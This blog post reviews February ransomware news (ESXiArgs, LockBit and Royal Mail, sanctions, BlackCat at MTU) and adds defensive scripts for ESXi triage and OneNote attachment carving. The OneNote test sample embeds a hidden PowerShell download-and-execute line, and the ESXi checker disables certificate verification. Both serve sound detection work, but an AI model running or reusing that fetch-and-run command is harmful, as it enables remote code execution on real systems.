“There are decades where nothing happens; and there are weeks where decades happen”
As unusual as it feels for me to put a Bolshevik quote on my blog, I can’t think of a better phrase to sum up what a strange and busy month it has been (and we’re only halfway through).
A lot has happened on the ransomware front so far in February, and I mean it, A LOT.
1. ESXiArgs ransomware
A two-year-old vulnerability, CVE-2021-21974, was exploited on unpatched VMware ESXi servers.
The MITRE CVE entry describes it as follows: “A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution”. In plain terms: an unauthenticated heap overflow in the OpenSLP daemon (slpd) listening on port 427, so any ESXi host whose port 427 is reachable by an attacker is exposed.
Running software unpatched for OVER two years when the fix has been available the whole time sounds incredible, yet it happens all the time. To make matters worse, several days into this widely reported campaign Rapid7 estimated that close to 19,000 internet-exposed ESXi servers were still vulnerable. Where patching is not immediately possible, VMware’s published workaround for this CVE is to disable the OpenSLP service on hosts that do not need it, and port 427 should not be reachable from untrusted networks in the first place.
Luckily, a recovery guide for VMware ESXi has been published by security researchers Enes Sonmez & Ahmet Aykac from YoreGroup Tech Team. It can be accessed here. Recovery is possible because the first wave of the encryptor was reported to leave the large -flat.vmdk data files unencrypted, so the encrypted descriptor and configuration files can be rebuilt from them; do not count on this with later variants, which were reported to encrypt more of the data.
Separately, CISA released their own recovery script on their GitHub page.
At the time of writing there are over 2,000 compromised VMware ESXi servers still online, nearly half of them located in Germany and France, and the majority of those hosted at OVH SAS.
Affected servers can be found using this Shodan query:
http.title:"how to restore your files"
… or try out Censys and its search (results vary slightly from Shodan).
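The Shodan query above keys on the title of the ransom page the malware drops into the ESXi web UI. The following is an added example (my own code, not from the post, the researchers' guide or CISA's script) that applies the same check to your own hosts, and additionally looks for the `.args` sidecar files the encryptor writes next to every VM file it processes, which is where the ESXiArgs name comes from. The host name in `check_host()` and the HTML and datastore listing in the self-test are constructed samples, not real captures.

```python
"""Triage helpers for the ESXiArgs campaign (added example, not from the post).

Two checks a responder can run against their own estate:
  1. does an ESXi host's web UI now serve the ransom page that the Shodan
     query  http.title:"how to restore your files"  keys on?
  2. does a datastore listing contain the *.args sidecar files the
     encryptor drops next to each VM file it processes?
"""
import re
import ssl
import urllib.request
from html.parser import HTMLParser
from typing import Iterable

SHODAN_QUERY = 'http.title:"how to restore your files"'
RANSOM_TITLE = "how to restore your files"


class _TitleParser(HTMLParser):
    """Collects the text of the first <title> element in an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self._in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "title" and not self.title:
            self._in_title = True

    def handle_endtag(self, tag):
        if tag.lower() == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def page_title(html: str) -> str:
    """Normalised (whitespace-collapsed, lower-cased) page title."""
    p = _TitleParser()
    p.feed(html)
    return " ".join(p.title.split()).lower()


def is_ransom_page(html: str) -> bool:
    """Same semantics as the Shodan filter: case-insensitive substring match."""
    return RANSOM_TITLE in page_title(html)


def check_host(base_url: str, timeout: float = 5.0) -> bool:
    """Fetch a host's landing page and run is_ransom_page() on it.

    Network call, not exercised by the self-test. Assumes the ESXi UI is
    served over HTTPS at base_url (e.g. https://esxi01.example.internal/).
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # ESXi hosts usually carry self-signed certs
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(base_url, timeout=timeout, context=ctx) as resp:
        return is_ransom_page(resp.read().decode("utf-8", "replace"))


# File types the encrypt script targets, each of which gets a <name>.args sidecar.
_ARGS_SIDECAR = re.compile(
    r"^(?P<orig>.+\.(?:vmdk|vmx|vmxf|vmsd|nvram|vmem))\.args$", re.IGNORECASE
)


def find_encrypted_vm_files(paths: Iterable[str]) -> list[tuple[str, str]]:
    """Return (vm_file, sidecar) pairs for every *.args sidecar in a listing."""
    hits = []
    for p in sorted(set(paths)):
        m = _ARGS_SIDECAR.match(p)
        if m:
            hits.append((m.group("orig"), p))
    return hits


# Constructed samples (not real captures): a ransom page, a healthy ESXi UI,
# and a datastore listing from a host that has been hit.
RANSOM_HTML = (
    "<html><head><TITLE>How to Restore\n   Your Files</TITLE></head>"
    "<body>...</body></html>"
)
CLEAN_HTML = "<html><head><title>VMware ESXi</title></head><body></body></html>"
LISTING = [
    "/vmfs/volumes/datastore1/web01/web01.vmx",
    "/vmfs/volumes/datastore1/web01/web01.vmx.args",
    "/vmfs/volumes/datastore1/web01/web01.vmdk",
    "/vmfs/volumes/datastore1/web01/web01.vmdk.args",
    "/vmfs/volumes/datastore1/web01/web01-flat.vmdk",
]

if __name__ == "__main__":
    print("ransom page:", is_ransom_page(RANSOM_HTML), "| clean:", is_ransom_page(CLEAN_HTML))
    for vm_file, sidecar in find_encrypted_vm_files(LISTING):
        print(f"{vm_file} has sidecar {sidecar}")
```

Note that in the constructed listing the `-flat.vmdk` file has no sidecar, which is the situation the recovery guide relies on; a listing where the flat files also carry `.args` sidecars means the later, more thorough variant has run.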
2. LockBit and Royal Mail
The LockBit ransomware group officially claimed responsibility for the late January attack on Royal Mail and set a deadline of 9th February, threatening to release the UK postal service’s stolen data if the ransom demand was not met.
As of today, 14th February, LockBit claims to have “released all data”. However, no link to the alleged records has been published, and Royal Mail has stated that the attackers did not get hold of any of its customers’ personal data.
What LockBit did – true to their established MO – was to release the negotiations chat between them and Royal Mail / UK’s NCSC.
The chat offers a rare insight into how ransom payments are negotiated, and shows how in this case the ransomware group confused Royal Mail with Royal Mail International.
3. UK sanctions on ransomware actors
The UK government issued a sanctions notice (in coordination with its US counterparts) against seven Russian nationals, who had “assets frozen and travel bans imposed”.
The individuals in question are linked to the Ryuk and Conti ransomware operations, which in turn ties some of them to the infamous May 2021 Conti attack on Ireland’s HSE.
See the BBC article on the matter here.
The official UK Gov press release states that:
- it is almost certain that the Conti group were primarily financially motivated and chose their targets based on the perceived value they could extort from them
- key group members highly likely maintain links to the Russian Intelligence Services from whom they have likely received tasking. The targeting of certain organisations, such as the International Olympic Committee, by the group almost certainly aligns with Russian state objectives
- it is highly likely that the group evolved from previous cyber organised crime groups and likely have extensive links to other cyber criminals, notably EvilCorp and those responsible for Ryuk ransomware
4. Ransomware attack on MTU in Ireland
Last week four campuses of Munster Technological University (MTU) in Cork were turned into digital crime scenes by a ransomware attack attributed to the BlackCat (ALPHV) group.
Disruption to lectures and full closure of the facilities were the result, but the university stated it would not pay the ransom and would instead restore services from backups.
The timing may be coincidental, but similar attacks were reported around the same time across Europe and further afield, from Finland to Israel.
No indicators of compromise from the MTU attack have been disclosed publicly. There is, however, a clear and growing trend of malicious Microsoft OneNote (.one) attachments being used for initial delivery: the lure page shows a fake “double click to view document” button overlaid on an embedded script or executable (.bat, .vbs, .hta, .exe), which runs once the victim clicks through OneNote’s warning. Where there is no business need for OneNote attachments they are worth blocking at the mail gateway, and the embedded files can be carved out for inspection without a full OneNote parser.
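As an added example (my own code, not from the post or from any vendor named in it), here is a small scanner that carves embedded files out of a OneNote `.one` file and flags script or executable payloads. It relies only on the documented MS-ONESTORE layout of a FileDataStoreObject: a fixed header GUID, a 64-bit little-endian length, 12 bytes of unused/reserved fields, the attachment bytes, then a footer GUID. The `.one` file in the self-test is constructed in the script itself (a PNG stub standing in for the lure button and a batch file as the payload); the classification heuristics and their labels are my own.

```python
"""Carve and classify files embedded in a OneNote (.one) document.
Added example, not from the post. Uses the MS-ONESTORE FileDataStoreObject layout:

  guidHeader (16) | cbLength (8, uint64 LE) | unused (4) | reserved (8)
  | FileData (cbLength bytes) | guidFooter (16)

Scanning for guidHeader and honouring cbLength is enough to recover every
attachment without parsing the rest of the revision store.
"""
import struct
from dataclasses import dataclass

ONE_FILE_MAGIC = bytes.fromhex("E4525C7B8CD8A74DAEB15378D02996D3")  # {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}
FDSO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")     # {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FDSO_FOOTER = bytes.fromhex("22A7FB71790F0B4ABB13899256426B24")     # {71FBA722-0F79-4A0B-BB13-899256426B24}
FDSO_HEADER_LEN = 16 + 8 + 4 + 8

SUSPICIOUS = {"pe-executable", "batch/powershell-script", "hta/html-script", "vbscript"}


def classify(data: bytes) -> str:
    """Cheap content sniff; labels are this example's own, not a standard taxonomy."""
    head = data[:512].lstrip()
    low = head.lower()
    if head.startswith(b"MZ"):
        return "pe-executable"
    if low.startswith(b"@echo off") or b"cmd /c" in low or b"powershell" in low:
        return "batch/powershell-script"
    if b"<script" in low or b"<hta:application" in low:
        return "hta/html-script"
    if b"wscript" in low or b"createobject(" in low or low.startswith(b"dim "):
        return "vbscript"
    if head.startswith(b"\x89PNG") or head.startswith(b"\xff\xd8"):
        return "image"
    return "unknown"


@dataclass
class Embedded:
    offset: int      # offset of the FileDataStoreObject header in the file
    data: bytes      # the carved attachment
    kind: str        # classify() label
    footer_ok: bool  # footer GUID found right after the data (allowing 8-byte padding)


def is_onenote(blob: bytes) -> bool:
    return blob[:16] == ONE_FILE_MAGIC


def carve_embedded_files(blob: bytes) -> list[Embedded]:
    found = []
    pos = blob.find(FDSO_HEADER)
    while pos != -1:
        if pos + FDSO_HEADER_LEN > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start, end = pos + FDSO_HEADER_LEN, pos + FDSO_HEADER_LEN + length
        if length == 0 or end > len(blob):
            # truncated or malformed object: step past this header and keep scanning
            pos = blob.find(FDSO_HEADER, pos + 16)
            continue
        data = blob[start:end]
        footer_ok = FDSO_FOOTER in blob[end:end + 32]
        found.append(Embedded(pos, data, classify(data), footer_ok))
        pos = blob.find(FDSO_HEADER, end)
    return found


def scan(blob: bytes) -> dict:
    items = carve_embedded_files(blob)
    return {
        "is_onenote": is_onenote(blob),
        "embedded": len(items),
        "suspicious": [i.kind for i in items if i.kind in SUSPICIOUS],
    }


# ---- constructed sample (built here, not a real malware file) ---------------
def _fdso(data: bytes) -> bytes:
    """Wrap bytes in a FileDataStoreObject, padding FileData to 8 bytes."""
    pad = (-len(data)) % 8
    return FDSO_HEADER + struct.pack("<Q", len(data)) + b"\0" * 12 + data + b"\0" * pad + FDSO_FOOTER


LURE_BAT = b'@echo off\r\npowershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString($u)"\r\n'
BUTTON_PNG = b"\x89PNG\r\n\x1a\n" + b"\0" * 40
SAMPLE_ONE = ONE_FILE_MAGIC + b"\0" * 64 + _fdso(BUTTON_PNG) + b"\0" * 16 + _fdso(LURE_BAT) + b"\0" * 32

if __name__ == "__main__":
    print(scan(SAMPLE_ONE))
    for item in carve_embedded_files(SAMPLE_ONE):
        print(f"@{item.offset:#x} {item.kind:24s} {len(item.data):5d} bytes footer_ok={item.footer_ok}")
```

Run it over a real suspect attachment by replacing `SAMPLE_ONE` with the file's bytes; a `.one` that contains a single image plus a batch, VBS, HTA or PE object is the typical lure shape, and the carved payload can then be hashed and detonated on its own.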
I had the opportunity to offer some insights into profiling the BlackCat ransomware group here.
5. Eurostat - 22% of EU enterprises had ICT security incidents in 2021
A freshly released Eurostat report for 2021 states that 22.2% of businesses with 10 or more employees experienced ICT security incidents resulting in destruction, corruption or disclosure of data, or unavailability of services.
Over 6% of those incidents were attributed to ransomware, DDoS attacks, intrusions or other malicious software, with ransomware-type attacks specifically accounting for 3.5%.
Surprisingly (or not?), the most common causes of all ICT incidents were hardware or software failures.
So it seems those backups are indeed useful, for more than one reason.